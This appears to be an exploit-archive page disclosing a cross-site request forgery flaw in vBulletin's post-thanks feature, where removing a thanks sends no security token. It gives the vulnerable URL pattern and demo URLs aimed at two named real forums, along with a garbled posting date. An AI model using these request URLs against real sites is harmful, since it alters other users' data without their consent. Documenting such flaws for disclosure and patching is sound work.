Home / os / solaris

Vbulletin forums delete thanks CSRF All versions

Posted on 30 November -0001

<HTML><HEAD><TITLE>Vbulletin forums delete thanks CSRF (All versions)</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>######################################################## # Exploit Title: Vbulletin forums delete thanks CSRF (All versions) # Date : 2016/08/22 # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: https://www.vbulletin.com/ # Tested on: [Win 7/Firefox] # Version : All versions # Date : 27/08/2016 ######################################################## # # Location : http://localhost/forums/post_thanks.php?do=post_thanks_remove_user&p=[POST_ID] # ######################################################## # Demo 1 : # # for this: http://ashiyane.org/forums/showthread.php?13217-Target-Trainings&p=985835&viewfull=1#post985835 #http://ashiyXane.org/forums/post_thanks.php?do=post_thanks_remove_user&p=985835 # #for this: http://forums.irsXecteam.org/showthread.php?t=4686&p=5307&viewfull=1#post5307 #http://forums.irsXecteam.org/post_thanks.php?do=post_thanks_remove_user&p=5307 ######################################################## # Description : # #When you want to add a thanks a parameter called securitytoken but in thanks_remove the parameter token will not be sent #This problem is caused CSRF bug ######################################################## # discovered by : MALWaRE43 ########################################################</BODY></HTML>

 

TOP